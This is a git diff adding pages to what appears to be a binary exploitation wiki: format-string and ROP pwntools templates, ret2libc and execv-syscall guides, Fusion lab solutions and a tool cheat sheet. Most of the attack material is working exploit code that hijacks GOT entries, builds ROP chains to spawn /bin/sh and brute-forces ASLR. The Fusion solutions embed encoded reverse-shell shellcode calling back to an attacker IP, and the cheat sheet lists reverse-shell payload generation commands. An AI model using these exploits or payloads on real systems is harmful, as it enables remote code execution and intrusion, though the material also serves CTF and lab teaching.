chain**. +To calculate the base address just do `objdump -d vunbinary` and check the disassemble latest addresses: + +![](../../.gitbook/assets/image%20%2818%29.png) + +In that example you can see that only **1 Byte and a half is needed** to locate all the code, then, the base address in this situation will be the **leaked RIP but finishing on "000"**. For example if you leaked _0x562002970**ecf**_ the base address is _0x562002970**000**_ + +```python +elf.address = RIP - (RIP & 0xfff) +``` + + + diff --git a/exploiting/linux-exploiting-basic-esp/format-string-template.md b/exploiting/linux-exploiting-basic-esp/format-string-template.md new file mode 100644 index 00000000000..eb07104fba1 --- /dev/null +++ b/exploiting/linux-exploiting-basic-esp/format-string-template.md @@ -0,0 +1,117 @@ +# Format String Template + +```python +from pwn import * +from time import sleep + +#################### +#### CONNECTION #### +#################### + +# Define how you want to exploit the binary +LOCAL = True +REMOTETTCP = False +REMOTESSH = False +GDB = False + +# Configure vulnerable binary +LOCAL_BIN = "./tyler" +REMOTE_BIN = "./tyler" #For ssh + +# In order to exploit the format string you may need to append/prepend some string to the payload +# configure them here +PREFIX_PAYLOAD = b"echo " +SUFFIX_PAYLOAD = b"" + +def connect_binary(): + global P, ELF_LOADED, ROP_LOADED + + if LOCAL: + P = process(LOCAL_BIN) # start the vuln binary + ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary + ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets + + elif REMOTETTCP: + P = remote('10.10.10.10',1338) # start the vuln binary + ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary + ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets + + elif REMOTESSH: + ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220) + P = ssh_shell.process(REMOTE_BIN) # start the vuln binary + ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary + ROP_LOADED = ROP(elf)# Find ROP gadgets + + if GDB and not REMOTETTCP and not REMOTESSH: + # attach gdb and continue + # You can set breakpoints, for example "break *main" + gdb.attach(P.pid, "b *main") + + +######################################## +#### Get format string configuration ### +######################################## + +def send_payload(payload): + payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD + log.info("payload = %s" % repr(payload)) + P.sendline(payload) + sleep(0.5) + return P.recv() + + +def get_formatstring_config(): + global P + + for offset in range(1,1000): + connect_binary() + P.clean() + + payload = b"AAAA%" + bytes(str(offset), "utf-8") + b"$p" + recieved = send_payload(payload).strip() + + if b"41" in recieved: + for padlen in range(0,4): + if b"41414141" in recieved: + payload = b" "*padlen + b"BBBB%" + bytes(str(offset), "utf-8") + b"$p" + recieved = send_payload(payload).strip() + print(recieved) + if b"42424242" in recieved: + log.info(f"Found offset ({offset}) and padlen ({padlen})") + return offset, padlen + + else: + payload = b" " + payload + recieved = send_payload(payload).strip() + + +# In order to exploit a format string you need to find a position where part of your payload +# is being reflected. Then, you will be able to put in the position arbitrary addresses +# and write arbitrary content in those addresses +# Therefore, the function get_formatstring_config will find the offset and padd needed to exploit the format string + +offset, padlen = get_formatstring_config() + + +# In this template, the GOT of printf (the part of the GOT table that points to where the printf +# function resides) is going to be modified by the address of the system inside the PLT (the +# part of the code that will jump to the system function). +# Therefore, next time the printf function is executed, system will be executed instead with the same +# parameters passed to printf + +SYSTEM_PLT = ELF_LOADED.plt["system"] +P_GOT = ELF_LOADED.got["printf"] +log.info(f"System PLT address: {hex(SYSTEM_PLT)}") +log.info(f"Printf GOT address: {hex(P_GOT)}") + +format_string = FmtStr(execute_fmt=send_payload, offset=offset, padlen=padlen) +format_string.write(P_GOT, SYSTEM_PLT) +format_string.execute_writes() + + +# Now that printf function is executing system you just need to find a place where you can +# control the parameters passed to printf to execute arbitrary code. + +P.interactive() +``` + diff --git a/exploiting/linux-exploiting-basic-esp/fusion.md b/exploiting/linux-exploiting-basic-esp/fusion.md new file mode 100644 index 00000000000..68ba6530d2f --- /dev/null +++ b/exploiting/linux-exploiting-basic-esp/fusion.md @@ -0,0 +1,63 @@ +# Fusion + +## Level00 + +[http://exploit-exercises.lains.space/fusion/level00/](http://exploit-exercises.lains.space/fusion/level00/) + +1. Get offset to modify EIP +2. Put shellcode address in EIP + +```python +from pwn import * + +r = remote("192.168.85.181", 20000) + +buf = "GET " # Needed +buf += "A"*139 # Offset 139 +buf += p32(0xbffff440) # Stack address where the shellcode will be saved +buf += " HTTP/1.1" # Needed +buf += "\x90"*100 # NOPs + +#msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.85.178 LPORT=4444 -a x86 --platform linux -b '\x00\x2f' -f python +buf += "\xdb\xda\xb8\x3b\x50\xff\x66\xd9\x74\x24\xf4\x5a\x2b" +buf += "\xc9\xb1\x12\x31\x42\x17\x83\xea\xfc\x03\x79\x43\x1d" +buf += "\x93\x4c\xb8\x16\xbf\xfd\x7d\x8a\x2a\x03\x0b\xcd\x1b" +buf += "\x65\xc6\x8e\xcf\x30\x68\xb1\x22\x42\xc1\xb7\x45\x2a" +buf += "\x12\xef\xe3\x18\xfa\xf2\x0b\x4d\xa7\x7b\xea\xdd\x31" +buf += "\x2c\xbc\x4e\x0d\xcf\xb7\x91\xbc\x50\x95\x39\x51\x7e" +buf += "\x69\xd1\xc5\xaf\xa2\x43\x7f\x39\x5f\xd1\x2c\xb0\x41" +buf += "\x65\xd9\x0f\x01" + +r.recvline() +r.send(buf) +r.interactive() +``` + +## Level01 + +```python +from pwn import * + +r = remote("192.168.85.181", 20001) + +buf = "GET " # Needed +buf += "A"*139 # Offset 139 +buf += p32(0x08049f4f) # Adress of: JMP esp +buf += p32(0x9090E6FF) # OPCODE: JMP esi (the esi register have the address of the shellcode) +buf += " HTTP/1.1" # Needed +buf += "\x90"*100 # NOPs + +#msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.85.178 LPORT=4444 -a x86 --platform linux -b '\x00\x2f' -f python +buf += "\xdb\xda\xb8\x3b\x50\xff\x66\xd9\x74\x24\xf4\x5a\x2b" +buf += "\xc9\xb1\x12\x31\x42\x17\x83\xea\xfc\x03\x79\x43\x1d" +buf += "\x93\x4c\xb8\x16\xbf\xfd\x7d\x8a\x2a\x03\x0b\xcd\x1b" +buf += "\x65\xc6\x8e\xcf\x30\x68\xb1\x22\x42\xc1\xb7\x45\x2a" +buf += "\x12\xef\xe3\x18\xfa\xf2\x0b\x4d\xa7\x7b\xea\xdd\x31" +buf += "\x2c\xbc\x4e\x0d\xcf\xb7\x91\xbc\x50\x95\x39\x51\x7e" +buf += "\x69\xd1\xc5\xaf\xa2\x43\x7f\x39\x5f\xd1\x2c\xb0\x41" +buf += "\x65\xd9\x0f\x01" + +r.send(buf) +r.interactive() +``` + diff --git a/exploiting/linux-exploiting-basic-esp/ret2lib.md b/exploiting/linux-exploiting-basic-esp/ret2lib.md new file mode 100644 index 00000000000..d802eb1003a --- /dev/null +++ b/exploiting/linux-exploiting-basic-esp/ret2lib.md @@ -0,0 +1,76 @@ +# Ret2Lib + +**If you have found a vulnerable binary and you think that you can exploit it using Ret2Lib here you can find some basic steps that you can follow.** + +## If you are **inside** the **host** + +### You can find the **address of lib**c + +```bash +ldd /path/to/executable | grep libc.so.6 #Address (if ASLR, then this change every time) +``` + +If you want to check if the ASLR is changing the address of libc you can do: + +```bash +for i in `seq 0 20`; do ldd | grep libc; done +``` + +### Get offset of system function + +```bash +readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system +``` + +### Get offset of "/bin/sh" + +```bash +strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh +``` + +### /proc/<PID>/maps + +If the process is creating **children** every time you talk with it \(network server\) try to **read** that file \(probably you will need to be root\). + +Here you can find **exactly where is the libc loaded** inside the process and **where is going to be loaded** for every children of the process. + +![](../../.gitbook/assets/image%20%2899%29.png) + +In this case it is loaded in **0xb75dc000** \(This will be the base address of libc\) + +### Using gdb-peda + +Get address of **system** function, of **exit** function and of the string **"/bin/sh"** using gdb-peda: + +```text +p system +p exit +find "/bin/sh" +``` + +## Bypassing ASLR + +You can try to bruteforce the abse address of libc. + +```python +for off in range(0xb7000000, 0xb8000000, 0x1000): +``` + +## Code + +```python +from pwn import * + +c = remote('192.168.85.181',20002) +c.recvline() #Banner + +for off in range(0xb7000000, 0xb8000000, 0x1000): + p = "" + p += p32(off + 0x0003cb20) #system + p += "CCCC" #GARBAGE + p += p32(off + 0x001388da) #/bin/sh + payload = 'A'*0x20010 + p + c.send(payload) + c.interactive() #? +``` + diff --git a/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address.md b/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address.md new file mode 100644 index 00000000000..672b0df77b6 --- /dev/null +++ b/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address.md @@ -0,0 +1,289 @@ +# ROP - Leaking LIBC address + +## Quick Resume + +1. Find overflow offset +2. Find POP\_RDI, PUTS\_PLT and MAIN\_PLT gadgets +3. Find memory address of puts and guess the libc version \(donwload it\) +4. Given the library just exploit it + +## Other tutorials and binaries to practice + +This tutorial is going to exploit the code/binary proposed in this tutorial: [https://tasteofsecurity.com/security/ret2libc-unknown-libc/](https://tasteofsecurity.com/security/ret2libc-unknown-libc/) +Another useful tutorial: [https://made0x78.com/bseries-ret2libc/](https://made0x78.com/bseries-ret2libc/) + +## Code + +Filename: `vuln.c` + +```c +#include + +int main() { + char buffer[32]; + puts("Simple ROP.\n"); + gets(buffer); + + return 0; +} +``` + +```bash +gcc -o vuln vuln.c -fno-stack-protector -no-pie +``` + +## ROP - PWNtools template + +\*\*\*\*[**Find my ROP-PWNtools template here.**](rop-pwn-template.md) I'm going to use the code located there to make the exploit. +Download the exploit and place it in the same directory as the vulnerable binary. + +## 1- Finding the offset + +The template need an offset before continuing with the exploit. If any is provided it will execute the necessary code to find it \(by default `OFFSET = ""`\): + +```bash +#################### +#### Find offset ### +#################### +OFFSET = ""#"A"*72 +if OFFSET == "": + gdb.attach(p.pid, "c") #Attach and continue + payload = cyclic(1000) + print(r.clean()) + r.sendline(payload) + #x/wx $rsp -- Search for bytes that crashed the application + #cyclic_find(0x6161616b) # Find the offset of those bytes + return +``` + +**Execute** `python template.py` a GDB console will be opened with the program being crashed. Inside that **GDB console** execute `x/wx $rsp` to get the **bytes** that were going to overwrite the RIP. Finally get the **offset** using a **python** console: + +```python +from pwn import * +cyclic_find(0x6161616b) +``` + +![](../../.gitbook/assets/image%20%28188%29.png) + +After finding the offset \(in this case 40\) change the OFFSET variable inside the template using that value. +`OFFSET = "A" * 40` + +## 2- Finding Gadgets + +Now we need to find ROP gadgets inside the binary. This ROP gadgets will be useful to call `puts`to find the **libc** being used, and later to **launch the final exploit**. + +```python +PUTS_PLT = elf.plt['puts'] #PUTS_PLT = elf.symbols["puts"] # This is also valid to call puts +MAIN_PLT = elf.symbols['main'] +POP_RDI = (rop.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi" +RET = (rop.find_gadget(['ret']))[0] + +log.info("Main start: " + hex(MAIN_PLT)) +log.info("Puts plt: " + hex(PUTS_PLT)) +log.info("pop rdi; ret gadget: " + hex(POP_RDI)) +``` + +The `PUTS_PLT` is needed to call the **function puts**. +The `MAIN_PLT` is needed to call the **main function** again after one interaction to **exploit** the overflow **again** \(infinite rounds of exploitation\).It is used at the end of each ROP. +The **POP\_RDI** is needed to **pass** a **parameter** to the called function. + +In this step you don't need to execute anything as everything will be found by pwntools during the execution. + +## 3- Finding LIBC library + +Now is time to find which version of the **libc** library is being used. To do so we are going to **leak** the **address** in memory of the **function** `puts`and then we are going to **search** in which **library version** the puts version is in that address. + +```python +def get_addr(func_name): + FUNC_GOT = elf.got[func_name] + log.info(func_name + " GOT @ " + hex(FUNC_GOT)) + # Create rop chain + rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT) + + #Send our rop-chain payload + #p.sendlineafter("dah?", rop1) #Interesting to send in a specific moment + print(p.clean()) # clean socket buffer (read all and print) + p.sendline(rop1) + + #Parse leaked address + recieved = p.recvline().strip() + leak = u64(recieved.ljust(8, "\x00")) + log.info("Leaked libc address, "+func_name+": "+ hex(leak)) + #If not libc yet, stop here + if libc != "": + libc.address = leak - libc.symbols[func_name] #Save libc base + log.info("libc base @ %s" % hex(libc.address)) + + return hex(leak) + +get_addr("puts") #Search for puts address in memmory to obtains libc base +if libc == "": + print("Find the libc library and continue with the exploit... (https://libc.blukat.me/)") + p.interactive() +``` + +To do so, the most important line of the executed code is: + +```python +rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT) +``` + +This will send some bytes util **overwriting** the **RIP** is possible: `OFFSET`. +Then, it will set the **address** of the gadget `POP_RDI` so the next address \(`FUNC_GOT`\) will be saved in the **RDI** registry. This is because we want to **call puts** **passing** it the **address** of the `PUTS_GOT`as the address in memory of puts function is saved in the address pointing by `PUTS_GOT`. +After that, `PUTS_PLT` will be called \(with `PUTS_GOT` inside the **RDI**\) so puts will **read the content** inside `PUTS_GOT` \(**the address of puts function in memory**\) and will **print it out**. +Finally, **main function is called again** so we can exploit the overflow again. + +This way we have **tricked puts function** to **print** out the **address** in **memory** of the function **puts** \(which is inside **libc** library\). Now that we have that address we can **search which libc version is being used**. + +![](../../.gitbook/assets/image%20%2881%29.png) + +As we are **exploiting** some **local** binary it is **not needed** to figure out which version of **libc** is being used \(just find the library in `/lib/x86_64-linux-gnu/libc.so.6`\). +But, in a remote exploit case I will explain here how can you find it: + +### 3.1- Searching for libc version \(1\) + +You can search which library is being used in the web page: [https://libc.blukat.me/](https://libc.blukat.me/) +It will also allow you to download the discovered version of **libc** + +![](../../.gitbook/assets/image%20%2816%29.png) + +### 3.2- Searching for libc version \(2\) + +You can also do: + +* `$ git clone https://github.com/niklasb/libc-database.git` +* `$ cd libc-database` +* `$ ./get` + +This will take some time, be patient. +For this to work we need: + +* Libc symbol name: `puts` +* Leaked libc adddress: `0x7ff629878690` + +We can figure out which **libc** that is most likely used. + +```text +./find puts 0x7ff629878690 +ubuntu-xenial-amd64-libc6 (id libc6_2.23-0ubuntu10_amd64) +archive-glibc (id libc6_2.23-0ubuntu11_amd64) +``` + +We get 2 matches \(you should try the second one if the first one is not working\). Download the first one: + +```text +./download libc6_2.23-0ubuntu10_amd64 +Getting libc6_2.23-0ubuntu10_amd64 + -> Location: http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.23-0ubuntu10_amd64.deb + -> Downloading package + -> Extracting package + -> Package saved to libs/libc6_2.23-0ubuntu10_amd64 +``` + +Copy the libc from `libs/libc6_2.23-0ubuntu10_amd64/libc-2.23.so` to our working directory. + +### 3.3- Other functions to leak + +```python +puts +printf +__libc_start_main +read +gets +``` + +## 4- Finding based libc address & exploiting + +At this point we should know the libc library used. As we are exploiting a local binary I will use just:`/lib/x86_64-linux-gnu/libc.so.6` + +So, at the begging of `template.py` change the **libc** variable to: `libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it` + +Giving the **path** to the **libc library** the rest of the **exploit is going to be automatically calculated**. + +Inside the `get_addr`function the **base address of libc** is going to be calculated: + +```python +if libc != "": + libc.address = leak - libc.symbols[func_name] #Save libc base + log.info("libc base @ %s" % hex(libc.address)) +``` + +Then, the address to the function `system` and the **address** to the string _"/bin/sh"_ are going to be **calculated** from the **base address** of **libc** and given the **libc library.** + +```python +BINSH = next(libc.search("/bin/sh")) - 64 #Verify with find /bin/sh +SYSTEM = libc.sym["system"] +EXIT = libc.sym["exit"] + +log.info("bin/sh %s " % hex(BINSH)) +log.info("system %s " % hex(SYSTEM)) +``` + +Finally, the /bin/sh execution exploit is going to be prepared sent: + +```python +rop2 = OFFSET + p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) + p64(EXIT) + +p.clean() +p.sendline(rop2) + +##### Interact with the shell ##### +p.interactive() #Interact with the conenction +``` + +Let's explain this final ROP. +The last ROP \(`rop1`\) ended calling again the main function, then we can **exploit again** the **overflow** \(that's why the `OFFSET` is here again\). Then, we want to call `POP_RDI` pointing to the **addres** of _"/bin/sh"_ \(`BINSH`\) and call **system** function \(`SYSTEM`\) because the address of _"/bin/sh"_ will be passed as a parameter. +Finally, the **address of exit function** is **called** so the process **exists nicely** and any alert is generated. + +**This way the exploit will execute a** _**/bin/sh**_ **shell.** + +![](../../.gitbook/assets/image%20%28255%29.png) + +## 4\(2\)- Using ONE\_GADGET + +You could also use [ONE\_GADGET ](https://github.com/david942j/one_gadget)to obtain a shell instead of using **system** and **"/bin/sh". ONE\_GADGET** will find inside the libc library some way to obtain a shell using just one **ROP**. +However, normally there are some constrains, the most common ones and easy to avoid are like `[rsp+0x30] == NULL` As you control the values inside the **RSP** you just have to send some more NULL values so the constrain is avoided. + +```python +ONE_GADGET = libc.address + 0x4526a +rop2 = base + p64(ONE_GADGET) + "\x00"*100 +``` + +## EXPLOIT FILE + +You can find a template to exploit this vulnerability here: + +{% page-ref page="rop-pwn-template.md" %} + +## Common problems + +### MAIN\_PLT = elf.symbols\['main'\] not found + +If the "main" symbol does not exist. Then you can just where is the main code: + +```python +objdump -d vuln_binary | grep "\.text" +Disassembly of section .text: +0000000000401080 <.text>: +``` + +and set the address manually: + +```python +MAIN_PLT = 0x401080 +``` + +## Puts not found + +If the binary is not using Puts you should check if it is using + +### `sh: 1: %s%s%s%s%s%s%s%s: not found` + +If you find this **error** after creating **all** the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found` + +Try to **subtract 64 bytes to the address of "/bin/sh"**: + +```python +BINSH = next(libc.search("/bin/sh")) - 64 +``` + diff --git a/exploiting/linux-exploiting-basic-esp/rop-pwn-template.md b/exploiting/linux-exploiting-basic-esp/rop-pwn-template.md new file mode 100644 index 00000000000..2dc732ab408 --- /dev/null +++ b/exploiting/linux-exploiting-basic-esp/rop-pwn-template.md @@ -0,0 +1,162 @@ +# ROP-PWN template + +{% code title="template.py" %} +```python +from pwn import ELF, process, ROP, remote, ssh, gdb, cyclic, cyclic_find, log, p64, u64 # Import pwntools + + +#################### +#### CONNECTION #### +#################### +LOCAL = False +REMOTETTCP = True +REMOTESSH = False +GDB = False + +LOCAL_BIN = "./vuln" +REMOTE_BIN = "~/vuln" #For ssh +LIBC = "" #ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it + +if LOCAL: + P = process(LOCAL_BIN) # start the vuln binary + ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary + ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets + +elif REMOTETTCP: + P = remote('10.10.10.10',1339) # start the vuln binary + ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary + ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets + +elif REMOTESSH: + ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220) + p = ssh_shell.process(REMOTE_BIN) # start the vuln binary + elf = ELF(LOCAL_BIN)# Extract data from binary + rop = ROP(elf)# Find ROP gadgets + +if GDB and not REMOTETTCP and not REMOTESSH: + # attach gdb and continue + # You can set breakpoints, for example "break *main" + gdb.attach(P.pid, "b *main") + + + +########################## +##### OFFSET FINDER ###### +########################## + +OFFSET = b"" #b"A"*264 +if OFFSET == b"": + gdb.attach(P.pid, "c") #Attach and continue + payload = cyclic(264) + payload += b"AAAAAAAA" + print(P.clean()) + P.sendline(payload) + #x/wx $rsp -- Search for bytes that crashed the application + #print(cyclic_find(0x63616171)) # Find the offset of those bytes + P.interactive() + exit() + + + +##################### +#### Find Gadgets ### +##################### +try: + libc_func = "puts" + PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts +except: + libc_func = "printf" + PUTS_PLT = ELF_LOADED.plt['printf'] + +MAIN_PLT = ELF_LOADED.symbols['main'] +POP_RDI = (ROP_LOADED.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi" +RET = (ROP_LOADED.find_gadget(['ret']))[0] + +log.info("Main start: " + hex(MAIN_PLT)) +log.info("Puts plt: " + hex(PUTS_PLT)) +log.info("pop rdi; ret gadget: " + hex(POP_RDI)) +log.info("ret gadget: " + hex(RET)) + + +######################### +#### Finf LIBC offset ### +######################### + +def generate_payload_aligned(rop): + payload1 = OFFSET + rop + if (len(payload1) % 16) == 0: + return payload1 + + else: + payload2 = OFFSET + p64(RET) + rop + if (len(payload2) % 16) == 0: + log.info("Payload aligned successfully") + return payload2 + else: + log.warning(f"I couldn't align the payload! Len: {len(payload1)}") + return payload1 + + +def get_addr(libc_func): + FUNC_GOT = ELF_LOADED.got[libc_func] + log.info(libc_func + " GOT @ " + hex(FUNC_GOT)) + # Create rop chain + rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT) + rop1 = generate_payload_aligned(rop1) + + # Send our rop-chain payload + #P.sendlineafter("dah?", rop1) #Use this to send the payload when something is received + print(P.clean()) # clean socket buffer (read all and print) + P.sendline(rop1) + + # If binary is echoing back the payload, remove that message + recieved = P.recvline().strip() + if OFFSET[:30] in recieved: + recieved = P.recvline().strip() + + # Parse leaked address + log.info(f"Len rop1: {len(rop1)}") + leak = u64(recieved.ljust(8, b"\x00")) + log.info(f"Leaked LIBC address, {libc_func}: {hex(leak)}") + + # Set lib base address + if LIBC: + LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base + log.info("LIBC base @ %s" % hex(LIBC.address)) + + # If not LIBC yet, stop here + else: + print("TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)") + P.interactive() + + return hex(leak) + +get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base + + + +############################## +##### FINAL EXPLOITATION ##### +############################## + +BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh +SYSTEM = LIBC.sym["system"] +EXIT = LIBC.sym["exit"] + +log.info("POP_RDI %s " % hex(POP_RDI)) +log.info("bin/sh %s " % hex(BINSH)) +log.info("system %s " % hex(SYSTEM)) +log.info("exit %s " % hex(EXIT)) + +rop2 = p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) #p64(EXIT) +rop2 = generate_payload_aligned(rop2) + + +P.clean() +P.sendline(rop2) + + +P.interactive() #Interact with your shell :) +``` +{% endcode %} + diff --git a/exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md b/exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md new file mode 100644 index 00000000000..86502fb5787 --- /dev/null +++ b/exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md @@ -0,0 +1,51 @@ +# ROP - Syscall execv + +The objective is to call the **syscall \(execv\)** from a ROP controlling the value of registries: _RDI, RSI, RDX, RAX_ and obviously the _RIP_ \(the other ones doesn't matters\), and controlling somewhere to write _"/bin/sh"_ + +* **RDI**: Pointing to the string "/bin/bash" +* **RSI**: Null +* **RDX**: Null +* **RAX**: Value **0x3b** for x64 and **0xb** for x32, because this will call **execv** + +```bash +ROPgadget --binary vulnbinary | grep syscall +ROPgadget --binary vulnbinary | grep "rdi\|rsi\|rdx\|rax" | grep pop +``` + +## Writing + +If you can somehow write to an address and then get the address of where you have written then this step is unnecessary. + +Elsewhere, you may search for some **write-what-where**. +As is explained in this tutorial: [https://failingsilently.wordpress.com/2017/12/14/rop-chain-shell/](https://failingsilently.wordpress.com/2017/12/14/rop-chain-shell/) you have to find something that allows you to save some value inside a registry and then save it to some controlled address inside another registry. For example some `pop eax; ret` , `pop edx: ret` , `mov eax, [edx]` + +You can find mov gadgets doing: `ROPgadget --binary vulnbinary | grep mov` + +### Finding a place to write + +If you have found some **write-what-where** and can control the needed registries to call execv, there is only left finding a place to write. + +```bash +objdump -x vulnbinary | grep ".bss" -B1 + CONTENTS, ALLOC, LOAD, DATA + 23 .bss 00000010 00403418 00403418 00002418 2**3 +``` + +In this case: **0x403418** + +### **Writing** _**"/bin/sh"**_ + +```text +buffer += address(pop_eax) # place value into EAX +buffer += "/bin" # 4 bytes at a time +buffer += address(pop_edx) # place value into edx +buffer += address(writable_memory) +buffer += address(writewhatwhere) + +buffer += address(pop_eax) +buffer += "//sh" +buffer += address(pop_edx) +buffer += address(writable_memory + 4) +buffer += address(writewhatwhere) +``` + diff --git a/exploiting/tools/README.md b/exploiting/tools/README.md new file mode 100644 index 00000000000..d29cd749aad --- /dev/null +++ b/exploiting/tools/README.md @@ -0,0 +1,165 @@ +# Exploiting Tools + +## Metasploit + +```text +pattern_create.rb -l 3000 #Length +pattern_offset.rb -l 3000 -q 5f97d534 #Search offset +nasm_shell.rb +nasm> jmp esp #Get opcodes +msfelfscan -j esi /opt/fusion/bin/level01 +``` + +### Shellcodes + +```text +msfvenom /p windows/shell_reverse_tcp LHOST= LPORT= [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c +``` + +## GDB + +### Install: + +apt-get install gdb + +### Parameters: + +**-q** --> No muestra mierda inicial al ejecutar gdb +**-x <file>** --> le pasas un archivo con instrucciones de gdb que ejecutará al inicio +**-p <pid>** --> Attach to process + +#### Instructions + +> **disassemble main** --> Dissasemble the function +> **disassemble 0x12345678** +> **set disassembly-flavor intel** +> **set follow-fork-mode child/parent** --> Follow created process +> **p system** --> Find the address of the system function +> **help** +> **quit** + +> **br func** --> Add breakpoint to function +> **br \*func+23** +> **br \*0x12345678 +> del NUM** --> Delete that number of br +> **watch EXPRESSION** --> Break if the value changes + +**> run** --> Execute +**> start** --> Start and break in main +> **n/next** --> Execute next instruction \(no inside\) +> **s/step** --> Execute next instruction +> **c/continue** --> Continue until next breakpoint + +> **set $eip = 0x12345678** --> Change value of $eip +> **info functions** --> Info abount functions +> **info functions func** --> Info of the funtion +> **info registers** --> Value of the registers +> **bt** --> Stack +> **bt full** --> Detailed stack + +> **print variable** +> **print 0x87654321 - 0x12345678** --> Caculate +> **examine o/x/u/t/i/s dir\_mem/reg/puntero** --> Shows content in octal/hexa/10/bin/instruction/ascii + +* **x/o 0xDir\_hex** +* **x/2x $eip** --> 2Words from EIP +* **x/2x $eip -4** --> $eip - 4 +* **x/8xb $eip** --> 8 bytes \(b-> byte, h-> 2bytes, w-> 4bytes, g-> 8bytes\) +* **i r eip** --> Value of $eip +* **x/w pointer** --> Value of the pointer +* **x/s pointer** --> String pointed by the pointer +* **x/xw &pointer** --> Address where the poiniter is located +* **x/i $eip** —> Instructions of the EIP + +### Peda + +**shellcode generate** x86/linux bindport 5555 127.0.0.1 +**shellcode generate** x86/linux connect 5555 127.0.0.1 +**checksec** --> Check protections +**searchmem /bin/sh** --> Find that string \(/bin/sh\) inside the memory + +### GDB server + +gdbserver --multi 0.0.0.0:23947 \(in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine\) + +## GCC + +**gcc -fno-stack-protector -D\_FORTIFY\_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> Compile without protections +**-o** --> Output +**-g** --> Save code \(GDB will be able to see it\) +**echo 0 > /proc/sys/kernel/randomize\_va\_space** --> To deactivate the ASLR in linux + +**To compile a shellcode: +nasm -f elf assembly.asm** --> return a ".o" +**ld assembly.o -o shellcodeout** --> Executable + +## Objdump + +**-d** --> Disassemble executable sections \(see opcodes of a compiled shellcode, find ROP Gadgets, find function address...\) +**-Mintel** --> Intel sintax +**-t** --> Symbols table \(grep varBSS to get the address\) +**-D** --> Disassemble all \(address of static variable\) +**-s -j .dtors** --> Contenido de dtors +**-s -j .got** --> Contenido de got +**-TR** --> Relocations +**ojdump -t --dynamic-relo ./exec \| grep puts** --> Address of "puts" to modify in GOT +**objdump -TR ./exec \| grep exit\(func lib\)** —> Get address of all the functions inside the GOT + +## Core dumps + +1. Run `ulimit -c unlimited` before starting my program +2. Run `sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t` +3. sudo gdb --core=<path/core> --quiet + +## More + +**ldd executable \| grep libc.so.6** --> Address \(if ASLR, then this change every time\) +**for i in \`seq 0 20\`; do ldd <Ejecutable> \| grep libc; done** --> Loop to see if the address changes a lot +**readelf -s /lib/i386-linux-gnu/libc.so.6 \| grep system** --> Offset of "system" +**strings -a -t x /lib/i386-linux-gnu/libc.so.6 \| grep /bin/sh** --> Offset of "/bin/sh" + +**strace executable** --> Functions called by the executable +**rabin2 -i ejecutable -->** Address of all the functions + +**/usr/share/metasploit-framework/tools/exploit/pattern\_create.rb --length 1000 +/usr/share/metasploit-framework/tools/exploit/pattern\_offset.rb --length 1000 --query 1Ad2** + +## **Inmunity debugger** + +```text +!mona modules #Get protections, look for all false except last one (Dll of SO) +!mona find -s "\xff\xe4" -m name_unsecure.dll #Search for opcodes insie dll space (JMP ESP) +``` + +## IDA + +### Debugging in remote linux + +Inside the IDA folder you can find binaries that can be used to debug a binary inside a linux. To do so move the binary _linux\_server_ or _linux\_server64_ inside the linux server and run it nside the folder that contains the binary: + +```text +./linux_server64 -Ppass +``` + + Then, configure the debugger: Debugger \(linux remote\) --> Proccess options...: + +![](../../.gitbook/assets/image%20%28112%29.png) + +### **Delphi binaries** + +I you have to reverse a Delphi binary I would suggest you tu use the IDA plugin [https://github.com/Coldzer0/IDA-For-Delphi](https://github.com/Coldzer0/IDA-For-Delphi)\*\*\*\* + +Just press **ATL+f7** \(import python plugin in IDA\) and select the python plugin. + +This plugin will execute the binary and resolve functoin names dynamically att the start of the debugging. After starting the debugging press again the Start button \(the green one or f9\) and a breakpoint will hit in the begining of the real code. + +It is also very interesting because if you press a boton in the graphic application the debugger will stop in the function executed by that bottom. + +### Golang binaries + +I you have to reverse a Golang binary I would suggest you tu use the IDA plugin [https://github.com/sibears/IDAGolangHelper](https://github.com/sibears/IDAGolangHelper) + +Just press 